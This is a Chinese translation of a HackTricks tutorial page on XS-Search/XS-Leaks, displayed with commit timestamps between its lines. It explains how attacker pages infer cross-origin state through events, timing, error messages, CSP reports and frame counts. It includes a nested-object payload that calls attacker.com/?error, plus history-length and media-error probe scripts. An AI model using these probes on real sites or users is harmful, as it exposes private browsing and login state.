2022-10-11 23:16:53 +00:00
# XS-Search/XS-Leaks
2022-04-28 16:01:33 +00:00
2024-01-10 06:29:36 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2024-02-09 08:09:21 +00:00
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 可以轻松构建和**自动化工作流**,利用全球**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-06 04:10:34 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-06 04:10:34 +00:00
支持HackTricks的其他方式:
2023-12-31 04:43:12 +00:00
2024-02-06 04:10:34 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-02-09 08:09:21 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**上关注**我们。
2024-02-06 04:10:34 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-02-06 04:10:34 +00:00
## 基本信息
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
XS-Search是一种利用**侧信道漏洞**来提取**跨源信息**的方法。
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
参与此攻击的关键组件包括:
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
* **易受攻击的Web**: 意图提取信息的目标网站。
2024-02-09 08:09:21 +00:00
* **攻击者的Web**: 攻击者创建的恶意网站,受害者访问,托管利用程序。
2024-02-06 04:10:34 +00:00
* **包含方法**: 用于将易受攻击的Web合并到攻击者的Web中的技术( 例如, window.open, iframe, fetch, 带有href的HTML标签等) 。
* **泄漏技术**: 用于通过包含方法收集的信息来区分易受攻击的Web状态差异的技术。
* **状态**: 攻击者旨在区分易受攻击的Web的两种潜在状态。
* **可检测差异**: 攻击者依赖于推断易受攻击的Web状态的可观察变化。
2022-06-27 23:34:20 +00:00
2023-12-31 04:43:12 +00:00
### 可检测差异
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
可以分析几个方面以区分易受攻击的Web的状态:
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
* **状态码**: 区分跨源的**各种HTTP响应状态码**,如服务器错误、客户端错误或身份验证错误。
* **API使用**: 识别页面间**Web API的使用**, 揭示跨源页面是否使用特定的JavaScript Web API。
2024-02-09 08:09:21 +00:00
* **重定向**: 检测到导航到不同页面, 不仅是HTTP重定向, 还包括JavaScript或HTML触发的导航。
2024-02-06 04:10:34 +00:00
* **页面内容**: 观察**HTTP响应主体**或页面子资源的变化,例如**嵌入帧的数量**或图像大小差异。
* **HTTP头**: 注意特定HTTP响应头的存在或可能的值, 包括诸如X-Frame-Options、Content-Disposition和Cross-Origin-Resource-Policy等头。
* **时间**: 注意两种状态之间的一致时间差异。
2022-06-27 23:34:20 +00:00
2023-08-03 19:12:22 +00:00
### 包含方法
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
* **HTML元素**: HTML提供各种元素用于**包含跨源资源**, 如样式表、图像或脚本, 迫使浏览器请求非HTML资源。可在[https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks)找到此目的的潜在HTML元素的汇编。
* **框架**: 诸如**iframe**、**object**和**embed**等元素可以直接将HTML资源嵌入到攻击者的页面中。如果页面**缺乏框架保护**, JavaScript可以通过contentWindow属性访问被框架资源的window对象。
2024-02-09 08:09:21 +00:00
* **弹出窗口**: ** `window.open` **方法在新标签页或窗口中打开资源, 为JavaScript提供一个遵循SOP后与方法和属性交互的**窗口句柄**。弹出窗口通常用于单点登录, 绕过目标资源的框架和cookie限制。但是, 现代浏览器限制了弹出窗口的创建, 只允许特定用户操作。
2024-02-06 04:10:34 +00:00
* **JavaScript请求**: JavaScript允许使用**XMLHttpRequests**或**Fetch API**直接请求目标资源。这些方法提供对请求的精确控制, 例如选择是否跟随HTTP重定向。
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
### 泄漏技术
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
* **事件处理程序**: 在XS-Leaks中的一个经典泄漏技术, 事件处理程序如**onload**和**onerror**提供有关资源加载成功或失败的信息。
2024-02-09 08:09:21 +00:00
* **错误消息**: JavaScript异常或特殊错误页面可以直接提供泄漏信息, 要么通过错误消息本身, 要么通过区分其存在与不存在。
* **全局限制**: 浏览器的物理限制,如内存容量或其他强制浏览器限制,可以在达到阈值时发出信号,作为泄漏技术。
2024-02-06 04:10:34 +00:00
* **全局状态**: 可以利用与浏览器的**全局状态**( 例如History接口) 的可检测交互。例如, 浏览器历史记录中的**条目数量**可以提供有关跨源页面的线索。
* **性能API**: 此API提供当前页面的**性能详细信息**,包括文档和加载资源的网络时间,从而推断请求的资源。
2024-02-09 08:09:21 +00:00
* **可读属性**: 一些HTML属性是**跨源可读**的,可用作泄漏技术。例如,`window.frame.length`属性允许JavaScript计算跨源网页中包含的帧数。
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
## XSinator工具和论文
2022-06-28 15:48:43 +00:00
2024-02-06 04:10:34 +00:00
XSinator是一个自动工具, 用于检查浏览器是否受到其论文中解释的**几种已知XS-Leaks**的影响:**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf)**
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
您可以在[https://xsinator.com/](https://xsinator.com/)上**访问该工具**
2022-06-28 15:48:43 +00:00
{% hint style="warning" %}
2024-02-09 08:09:21 +00:00
**排除的XS-Leaks**: 我们不得不排除依赖**服务工作者**的XS-Leaks, 因为它们会干扰XSinator中的其他泄漏。此外, 我们选择**排除依赖特定Web应用程序中的配置错误和漏洞**的XS-Leaks。例如, 跨源资源共享( CORS) 配置错误, postMessage泄漏或跨站脚本。此外, 我们排除了基于时间的XS-Leaks, 因为它们经常受到速度慢、嘈杂和不准确的影响。
2022-06-28 15:48:43 +00:00
{% endhint %}
2022-06-27 23:34:20 +00:00
2024-01-10 06:29:36 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2024-02-06 04:10:34 +00:00
\
2024-02-09 08:09:21 +00:00
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 可以轻松构建和**自动化工作流**,利用全球**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2024-02-06 04:10:34 +00:00
## **基于时间的技术**
以下一些技术将使用时间作为检测网页可能状态差异的过程的一部分。在Web浏览器中有不同的测量时间的方法。
**时钟**: [performance.now() ](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now ) API允许开发人员获取高分辨率的时间测量。\
攻击者可以滥用大量API来创建隐式时钟: [Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast\_Channel\_API)、[Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel)、[requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame)、[setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout)、CSS动画等。\
更多信息:[https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/)。
2023-08-03 19:12:22 +00:00
## 事件处理程序技术
2022-06-27 23:34:20 +00:00
2022-06-28 12:20:37 +00:00
### Onload/Onerror
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
* **包含方法**: 框架、HTML元素
* **可检测差异**: 状态码
* **更多信息**: [https://www.usenix.org/conference/usenixsecurity19/presentation/staicu ](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu )、[https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
2024-02-09 08:09:21 +00:00
* **摘要**: 如果尝试在onerror/onload事件中加载资源时, 触发资源成功加载/加载失败的事件,就可以确定状态码。
2024-02-06 04:10:34 +00:00
* **代码示例**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script) ](https://xsinator.com/testing.html#Event%20Handler%20Leak%20\(Script\ ))
2022-06-27 23:34:20 +00:00
2023-01-02 23:15:01 +00:00
{% content-ref url="xs-search/cookie-bomb-+-onerror-xs-leak.md" %}
[cookie-bomb-+-onerror-xs-leak.md ](xs-search/cookie-bomb-+-onerror-xs-leak.md )
{% endcontent-ref %}
2024-02-06 04:10:34 +00:00
代码示例尝试从JS中**加载脚本对象**,但也可以使用**其他标签**,如对象、样式表、图像、音频。此外,还可以直接注入**标签**,并在标签内部声明`onload`和`onerror`事件( 而不是从JS中注入) 。
2022-06-27 23:34:20 +00:00
2024-02-09 08:09:21 +00:00
还有这种攻击的无脚本版本:
2022-06-27 23:34:20 +00:00
```html
< object data = "//example.com/404" >
2023-08-03 19:12:22 +00:00
< object data = "//attacker.com/?error" > < / object >
2022-06-27 23:34:20 +00:00
< / object >
```
2024-02-09 08:09:21 +00:00
在这种情况下,如果未找到 `example.com/404` ,将加载 `attacker.com/?error` 。
2022-06-27 23:34:20 +00:00
2024-02-09 08:09:21 +00:00
### Onload 时间
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
* **包含方法**: HTML 元素
* **可检测差异**:时间(通常由页面内容、状态码引起)
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events)
* **摘要**: [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** 可用于测量执行请求所需的时间。然而,也可以使用其他时钟,如[**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming),它可以识别运行超过 50 毫秒的任务。
* **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) 另一个示例在:
2023-01-02 14:57:39 +00:00
{% content-ref url="xs-search/performance.now-example.md" %}
[performance.now-example.md ](xs-search/performance.now-example.md )
{% endcontent-ref %}
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
#### Onload 时间 + 强制重任务
2023-01-02 20:55:19 +00:00
2024-02-09 08:09:21 +00:00
这种技术与前一种类似,但**攻击者**还将在**答案为正或负时**强制执行某些操作以**测量**该时间。
2023-01-02 20:55:19 +00:00
{% content-ref url="xs-search/performance.now-+-force-heavy-task.md" %}
[performance.now-+-force-heavy-task.md ](xs-search/performance.now-+-force-heavy-task.md )
{% endcontent-ref %}
2024-02-09 08:09:21 +00:00
### unload/beforeunload 时间
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
* **包含方法**:框架
* **可检测差异**:时间(通常由页面内容、状态码引起)
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
* **摘要**:可以使用[SharedArrayBuffer 时钟](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers)来测量执行请求所需的时间。也可以使用其他时钟。
* **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
通过利用[`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event)和[`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event)事件,可以测量获取资源所需的时间。**`beforeunload`** 事件在浏览器即将导航到新页面时触发,而 ** `unload` ** 事件在实际导航发生时发生。可以计算这两个事件之间的时间差来确定浏览器获取资源所花费的时间。
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
### 沙箱框架时间 + onload <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
* **包含方法**:框架
* **可检测差异**:时间(通常由页面内容、状态码引起)
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
* **摘要**: [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API 可用于测量执行请求所需的时间。也可以使用其他时钟。
* **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
观察到,在缺乏[框架保护](https://xsleaks.dev/docs/defenses/opt-in/xfo/)的情况下,攻击者可以测量页面及其子资源通过网络加载所需的时间。这种测量通常是可能的,因为仅在 iframe 的 `onload` 处理程序在资源加载和 JavaScript 执行完成后才会触发。为了绕过脚本执行引入的变化性,攻击者可能会在 `<iframe>` 中使用 [`sandbox` ](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe ) 属性。包含此属性限制了许多功能,特别是 JavaScript 的执行,从而促进主要受网络性能影响的测量。
2024-02-06 04:10:34 +00:00
```javascript
// Example of an iframe with the sandbox attribute
< iframe src = "example.html" sandbox > < / iframe >
```
2022-06-28 15:48:43 +00:00
### #ID + error + onload
2024-02-06 04:10:34 +00:00
* **包含方法**: Frames
2023-08-03 19:12:22 +00:00
* **可检测差异**:页面内容
* **更多信息**:
2024-02-09 08:09:21 +00:00
* **摘要**:如果能够使页面在访问正确内容时出现错误,并在访问任何内容时正确加载,那么您可以创建一个循环来提取所有信息,而无需测量时间。
2023-08-03 19:12:22 +00:00
* **代码示例**:
2022-06-28 15:48:43 +00:00
2024-02-06 04:10:34 +00:00
假设您可以**插入**包含**秘密内容**的**页面**到**一个iframe**中。
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
您可以利用**CSRF**( 例如) 使受害者搜索包含“_**flag**_”的文件。在**iframe**内,您知道**`onload`事件**将**至少执行一次**。然后, 您可以通过仅更改URL中的**哈希**内容来**更改iframe的URL**。
2022-06-28 15:48:43 +00:00
2023-08-03 19:12:22 +00:00
例如:
2022-06-28 15:48:43 +00:00
2023-08-03 19:12:22 +00:00
1. **URL1** : www.attacker.com/xssearch#try1
2. **URL2** : www.attacker.com/xssearch#try2
2022-06-28 15:48:43 +00:00
2024-02-06 04:10:34 +00:00
如果第一个URL**成功加载**,那么当**更改**URL的**哈希**部分时,**`onload`**事件将**不会再次触发**。但是,**如果**页面在**加载**时出现**某种错误**,那么**`onload`**事件将**再次触发**。
2022-06-28 15:48:43 +00:00
2024-02-06 04:10:34 +00:00
然后,您可以**区分**一个**正确加载**的页面或访问时出现**错误**的页面。
2022-06-28 15:48:43 +00:00
2024-02-06 04:10:34 +00:00
### Javascript执行
2023-01-22 23:19:55 +00:00
2024-02-06 04:10:34 +00:00
* **包含方法**: Frames
2023-08-03 19:12:22 +00:00
* **可检测差异**:页面内容
* **更多信息**:
2024-02-09 08:09:21 +00:00
* **摘要**:如果**页面**返回**敏感内容**,或者用户可以**控制的内容**。用户可以在**负面情况下**设置**有效的JS代码**,并在**`< script > `**标签中**加载**每次尝试,因此在**负面**情况下,攻击者的**代码**将被**执行**,而在**肯定**情况下**不会执行**任何操作。
2023-08-03 19:12:22 +00:00
* **代码示例**:
2023-01-22 23:19:55 +00:00
{% content-ref url="xs-search/javascript-execution-xs-leak.md" %}
[javascript-execution-xs-leak.md ](xs-search/javascript-execution-xs-leak.md )
{% endcontent-ref %}
2023-12-31 04:43:12 +00:00
2022-06-28 12:20:37 +00:00
### CORB - Onerror
2024-02-06 04:10:34 +00:00
* **包含方法**: HTML元素
* **可检测差异**:状态码和标头
2023-08-03 19:12:22 +00:00
* **更多信息**: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/)
2024-02-09 08:09:21 +00:00
* **摘要**: **跨源读取阻止( CORB) **是一项安全措施,用于防止网页加载某些敏感的跨源资源,以防止**Spectre**等攻击。然而,攻击者可以利用其保护行为。当受**CORB**约束的响应返回一个带有`nosniff`和`2xx`状态码的**CORB受保护**`Content-Type`时,**CORB**会剥离响应的主体和标头。观察到这一点的攻击者可以推断**状态码**(指示成功或错误)和`Content-Type`(表示是否受**CORB**保护)的组合,从而导致潜在的信息泄漏。
2023-08-03 19:12:22 +00:00
* **代码示例**:
2022-06-28 12:20:37 +00:00
2023-12-31 04:43:12 +00:00
查看更多信息链接以获取有关攻击的更多信息。
2022-06-28 12:20:37 +00:00
### onblur
2024-02-06 04:10:34 +00:00
* **包含方法**: Frames
2023-08-03 19:12:22 +00:00
* **可检测差异**:页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/id-attribute/](https://xsleaks.dev/docs/attacks/id-attribute/), [https://xsleaks.dev/docs/attacks/experiments/portals/ ](https://xsleaks.dev/docs/attacks/experiments/portals/ )
2024-02-06 04:10:34 +00:00
* **摘要**: 从id或name属性泄漏敏感数据。
2023-08-03 19:12:22 +00:00
* **代码示例**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
2022-06-28 12:20:37 +00:00
2024-02-09 08:09:21 +00:00
可以**加载页面**到**iframe**中,并使用**`#id_value`**使页面**聚焦**在指定的iframe元素上, 然后如果**触发`onblur`**信号, ID元素存在。\
2024-02-06 04:10:34 +00:00
您可以使用**`portal`**标签执行相同的攻击。
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
### postMessage广播 <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
2022-06-28 15:48:43 +00:00
2024-02-06 04:10:34 +00:00
* **包含方法**: Frames, 弹出窗口
* **可检测差异**: API使用
2023-08-03 19:12:22 +00:00
* **更多信息**: [https://xsleaks.dev/docs/attacks/postmessage-broadcasts/](https://xsleaks.dev/docs/attacks/postmessage-broadcasts/)
2024-02-09 08:09:21 +00:00
* **摘要**: 从postMessage中收集敏感信息或使用postMessages的存在作为一个预言机来了解用户在页面中的状态。
2024-02-06 04:10:34 +00:00
* **代码示例**: `任何监听所有postMessages的代码。`
2022-06-28 15:48:43 +00:00
2024-02-06 04:10:34 +00:00
应用程序经常利用[`postMessage`广播](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage)在不同源之间进行通信。然而,如果未正确指定`targetOrigin`参数,此方法可能会无意中暴露**敏感信息**,允许任何窗口接收消息。此外,接收消息本身可能充当一个**预言机**;例如,某些消息可能仅发送给已登录的用户。因此,这些消息的存在或不存在可以揭示有关用户状态或身份的信息,例如他们是否已经认证。
2022-06-28 15:48:43 +00:00
2024-01-10 06:29:36 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-06-28 17:21:21 +00:00
```javascript
// Code saved here in case it dissapear from the link
// Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
window.addEventListener("load", startup, false);
function displayErrorMessage(msg) {
2023-08-03 19:12:22 +00:00
document.getElementById("log").innerHTML += msg;
2022-06-28 17:21:21 +00:00
}
function startup() {
2023-08-03 19:12:22 +00:00
let audioElement = document.getElementById("audio");
// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
document.getElementById("startTest").addEventListener("click", function() {
audioElement.src = document.getElementById("testUrl").value;
}, false);
// Create the event handler
var errHandler = function() {
let err = this.error;
let message = err.message;
let status = "";
// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
// Firefox error.message when the request loads successfully: "Failed to init decoder"
if((message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1) || (message.indexOf("Failed to init decoder") != -1)){
status = "Success";
}else{
status = "Error";
}
displayErrorMessage("< strong > Status: " + status + "< / strong > (Error code:" + err.code + " / Error Message: " + err.message + ")< br > ");
};
audioElement.onerror = errHandler;
2022-06-28 17:21:21 +00:00
}
```
2024-02-06 04:10:34 +00:00
### CORS错误
2022-06-28 12:20:37 +00:00
2024-02-09 08:09:21 +00:00
* **包含方法**: Fetch API
* **可检测差异**:标头
* **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
* **摘要**: 在安全断言( SA) 中, CORS错误消息无意中暴露了重定向请求的完整URL。
* **代码示例**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
2022-06-28 12:20:37 +00:00
2024-02-09 08:09:21 +00:00
这种技术使攻击者能够通过利用基于Webkit的浏览器处理CORS请求的方式, **提取跨源站点重定向的目标**。具体来说,当向发出基于用户状态的重定向的目标站点发送**启用CORS的请求**,并且浏览器随后拒绝该请求时,错误消息中会披露**重定向目标的完整URL**。这种漏洞不仅会揭示重定向的事实,还会暴露重定向的端点以及可能包含的任何**敏感查询参数**。
2023-03-05 22:20:47 +00:00
2024-02-06 04:10:34 +00:00
### SRI错误
2022-06-27 23:34:20 +00:00
2024-02-09 08:09:21 +00:00
* **包含方法**: Fetch API
* **可检测差异**:标头
* **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
* **摘要**: 在安全断言( SA) 中, SRI错误消息无意中暴露了重定向请求的完整URL。
* **代码示例**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
2022-06-27 23:34:20 +00:00
2024-02-09 08:09:21 +00:00
攻击者可以利用**冗长的错误消息**推断跨源响应的大小。这是由于子资源完整性( SRI) 的机制, 它使用完整性属性验证从CDN等地方获取的资源是否未被篡改。为了使SRI在跨源资源上工作, 这些资源必须是**启用CORS的**; 否则, 它们不会受到完整性检查的影响。在安全断言( SA) 中, 就像CORS错误XS-Leak一样, 可以在带有完整性属性的任何请求失败后捕获错误消息。攻击者可以通过将完整性属性分配给任何请求的**虚假哈希值**来故意**触发此错误**。在SA中, 由此产生的错误消息无意中揭示了所请求资源的内容长度。这种信息泄漏使攻击者能够辨别响应大小的变化, 为复杂的XS-Leak攻击铺平了道路。
2022-06-27 23:34:20 +00:00
2024-02-06 04:10:34 +00:00
### CSP违规/检测
2022-06-27 23:34:20 +00:00
2024-02-09 08:09:21 +00:00
* **包含方法**:弹出窗口
* **可检测差异**:状态码
* **更多信息**: [https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html ](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html ), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects ](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects )
* **摘要**: 如果我们访问的受害者网站只允许CSP中的域名尝试重定向到不同的域名, CSP将触发可检测的错误。
* **代码示例**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation ](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation )
2022-06-27 23:34:20 +00:00
2024-02-09 08:09:21 +00:00
XS-Leak可以使用CSP检测跨源站点是否被重定向到不同的源。此泄漏可以检测重定向, 但另外, 重定向目标的域名也会泄漏。这种攻击的基本思想是**在攻击者站点上允许目标域名**。一旦向目标域名发出请求,它**重定向**到一个跨源域。**CSP阻止**对其的访问,并创建用作泄漏技术的**违规报告**。根据浏览器的不同,**此报告可能泄露重定向的目标位置**。\
现代浏览器不会指示重定向到的URL, 但仍然可以检测到触发了跨源重定向。
2022-08-08 23:51:39 +00:00
```javascript
async function debug(win, url) {
2023-08-03 19:12:22 +00:00
win.location = url + '#aaa';
win.location = 'about:blank';
await new Promise(r => setTimeout(r, 500));
return win.history.length;
2022-08-08 23:51:39 +00:00
}
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=c"));
win.close();
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=b"));
```
2023-08-03 19:12:22 +00:00
### 帧计数
2022-08-08 23:51:39 +00:00
2024-02-06 04:10:34 +00:00
* **包含方法**:帧、弹出窗口
2023-08-03 19:12:22 +00:00
* **可检测差异**:页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/frame-counting/](https://xsleaks.dev/docs/attacks/frame-counting/)
2024-02-09 08:09:21 +00:00
* **摘要**:通过检查 `window.length` 属性评估 iframe 元素的数量。
2023-08-03 19:12:22 +00:00
* **代码示例**: [https://xsinator.com/testing.html#Frame%20Count%20Leak](https://xsinator.com/testing.html#Frame%20Count%20Leak)
2022-06-27 23:34:20 +00:00
2024-02-09 08:09:21 +00:00
通过 `iframe` 或 `window.open` 打开的网页中**帧的数量**可能有助于识别**用户在该页面上的状态**。\
此外,如果页面始终具有相同数量的帧,**持续**检查帧的数量可能有助于识别可能泄露信息的**模式**。
2022-06-27 23:34:20 +00:00
2024-02-09 08:09:21 +00:00
例如,在 Chrome 中,可以通过**帧计数**检测 **PDF** ,因为内部使用了 `embed` 。有一些[打开 URL 参数](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113)可以对内容进行一些控制,如 `zoom` 、`view`、`page`、`toolbar`,这种技术可能会很有趣。
2022-06-28 15:48:43 +00:00
2022-06-28 12:20:37 +00:00
### HTMLElements
2024-02-06 04:10:34 +00:00
* **包含方法**: HTML 元素
2023-08-03 19:12:22 +00:00
* **可检测差异**:页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/)
2024-02-06 04:10:34 +00:00
* **摘要**:读取泄露的值以区分两种可能的状态
* **代码示例**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/), [https://xsinator.com/testing.html#Media%20Dimensions%20Leak ](https://xsinator.com/testing.html#Media%20Dimensions%20Leak ), [https://xsinator.com/testing.html#Media%20Duration%20Leak ](https://xsinator.com/testing.html#Media%20Duration%20Leak )
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
通过 HTML 元素泄露信息是网络安全中的一个问题,特别是当基于用户信息生成动态媒体文件或添加水印以更改媒体大小时。攻击者可以利用这一点,通过分析某些 HTML 元素暴露的信息来区分可能的状态。
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
### HTML 元素泄露的信息
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
- **HTMLMediaElement**:此元素显示媒体的 `duration` 和 `buffered` 时间,可以通过其 API 访问。
[阅读更多关于 HTMLMediaElement ](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement )
- **HTMLVideoElement**:它公开 `videoHeight` 和 `videoWidth` 。在某些浏览器中,还提供了额外的属性,如 `webkitVideoDecodedByteCount` 、`webkitAudioDecodedByteCount` 和 `webkitDecodedFrameCount` ,提供了有关媒体内容的更深入信息。
[阅读更多关于 HTMLVideoElement ](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement )
- **getVideoPlaybackQuality()**:此函数提供有关视频播放质量的详细信息,包括 `totalVideoFrames` ,可以指示处理的视频数据量。
[阅读更多关于 getVideoPlaybackQuality() ](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality )
2024-02-09 08:09:21 +00:00
- **HTMLImageElement**:此元素泄露图像的 `height` 和 `width` 。但是,如果图像无效,则这些属性将返回 0, 并且 `image.decode()` 函数将被拒绝,表示未正确加载图像。
2024-02-06 04:10:34 +00:00
[阅读更多关于 HTMLImageElement ](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement )
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
### CSS 属性
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
* **包含方法**: HTML 元素
2023-08-03 19:12:22 +00:00
* **可检测差异**:页面内容
2024-02-06 04:10:34 +00:00
